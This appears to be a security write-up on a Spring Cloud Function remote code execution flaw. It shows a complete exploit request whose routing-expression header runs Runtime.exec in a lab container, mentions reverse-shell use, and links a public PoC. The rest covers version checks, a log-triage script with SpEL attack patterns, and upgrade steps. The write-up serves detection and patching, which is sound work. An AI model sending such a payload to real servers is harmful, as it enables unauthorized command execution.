Spring Cloud Function Vulnerability Overview
Spring Cloud Function is a function framework built on Spring Boot. Its routing function (exposed at the /functionRouter endpoint) reads a SpEL expression from the spring.cloud.function.routing-expression request header and evaluates it to decide which function should handle the request. Because the header value was evaluated without restrictions, an unauthenticated attacker can send a crafted request whose header contains an expression such as a T(...) type reference to java.lang.Runtime, execute arbitrary Java code on the server, and obtain the privileges of the service process.
Affected Versions
- 3.0.0.RELEASE <= Spring Cloud Function <= 3.1.6
- 3.2.0 <= Spring Cloud Function <= 3.2.2
Vulnerability Exploit
Public PoC: https://github.com/k3rwin/spring-cloud-function-rce
Vulnerability Environment Setup
The vulnerable environment from vulhub is used for reproduction.

Vulnerability Reproduction
The SpEL expression carried in the spring.cloud.function.routing-expression header of a request to /functionRouter is evaluated server-side. The request body ("test" below) is irrelevant to the vulnerability; the payload lives entirely in the header. The request used here:

POST /functionRouter HTTP/1.1
Host: vul.zgao.top:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("touch /tmp/success")
Content-Type: text/plain
Content-Length: 4

test

The command executed successfully: the file /tmp/success is created inside the container. Note that the HTTP response itself is not a reliable success indicator, since the expression runs before the response is built; check for the side effect (list /tmp inside the container) instead.

The same request with a different expression can be used to spawn a reverse shell; the command runs with the privileges of the JVM process.

Investigation and Detection
First confirm whether the application uses the vulnerable component. If it is built with Maven, check the project's pom.xml for spring-cloud-function dependencies and compare the resolved version against the affected ranges above:
grep -C2 'spring-cloud-function-context' pom.xml
Then look for exploitation attempts in the request logs. In this environment the application runs in Docker, so the container output (docker logs) is the log source. Search it for the keyword functionRouter: any request to that endpoint from an untrusted source is worth reviewing, and a spring.cloud.function.routing-expression header containing T(, getRuntime or exec( is a clear sign of an attack.
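The log search described above, as an added example (not the page's own tooling): a small triage script that flags every request to /functionRouter and rates it by whether the routing-expression header looks like a type-reference SpEL payload. The log lines are constructed for this example and assume a reverse proxy that was configured to log the header in a routing_expr="..." field; real Spring Boot console output does not include request headers, so adapt LINE_RE to whatever your proxy or access log actually records.

```python
import re
import sys

# Constructed sample lines (access-log style with the routing header appended).
# Not real logs from the page; the routing_expr field is an assumed proxy log format.
SAMPLE_LOG = """\
10.0.0.5 - - [29/Mar/2022:10:14:01 +0000] "GET /actuator/health HTTP/1.1" 200 15 "-" "curl/7.81.0" routing_expr="-"
203.0.113.7 - - [29/Mar/2022:10:14:09 +0000] "POST /functionRouter HTTP/1.1" 500 102 "-" "Mozilla/5.0" routing_expr="T(java.lang.Runtime).getRuntime().exec(\\"touch /tmp/success\\")"
10.0.0.8 - - [29/Mar/2022:10:15:22 +0000] "POST /functionRouter HTTP/1.1" 200 7 "-" "python-requests/2.27" routing_expr="uppercase"
198.51.100.3 - - [29/Mar/2022:10:16:40 +0000] "POST /functionRouter HTTP/1.1" 500 102 "-" "Mozilla/5.0" routing_expr="T(java.lang.ProcessBuilder)"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)" routing_expr="(?P<expr>.*)"$'
)

# Indicators of a type-reference / process-execution SpEL payload. A legitimate
# routing expression names a function (e.g. "uppercase"); it never needs T(...).
SPEL_RE = re.compile(r"T\(|getRuntime|ProcessBuilder|\.exec\(|java\.lang")


def triage(lines):
    """Return one record per request to /functionRouter, with a severity.

    'high'   : header contains SpEL execution indicators (attack)
    'review' : request hit the endpoint but the header looks benign
    """
    hits = []
    for line in lines:
        m = LINE_RE.match(line.rstrip("\n"))
        if not m or not m.group("path").startswith("/functionRouter"):
            continue
        expr = m.group("expr")
        hits.append({
            "ip": m.group("ip"),
            "ts": m.group("ts"),
            "status": int(m.group("status")),
            "expr": expr,
            "severity": "high" if SPEL_RE.search(expr) else "review",
        })
    return hits


if __name__ == "__main__":
    # Pipe real logs in, e.g.: docker logs <container> 2>&1 | python triage.py
    source = sys.stdin if not sys.stdin.isatty() else SAMPLE_LOG.splitlines()
    for h in triage(source):
        print(f"{h['severity']:6} {h['ip']:15} {h['ts']} status={h['status']} expr={h['expr']}")
```

The sample yields two high-severity records (the page's Runtime.exec payload and a ProcessBuilder probe) and one benign routing request. The HTTP status is deliberately not used as a signal: the vulnerable code executes the expression regardless of what it later returns.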

Fix Method
Upgrade Spring Cloud Function to 3.1.7 or 3.2.3 (or later). Until the upgrade is deployed, restrict network access to the /functionRouter endpoint, since the attack requires no authentication.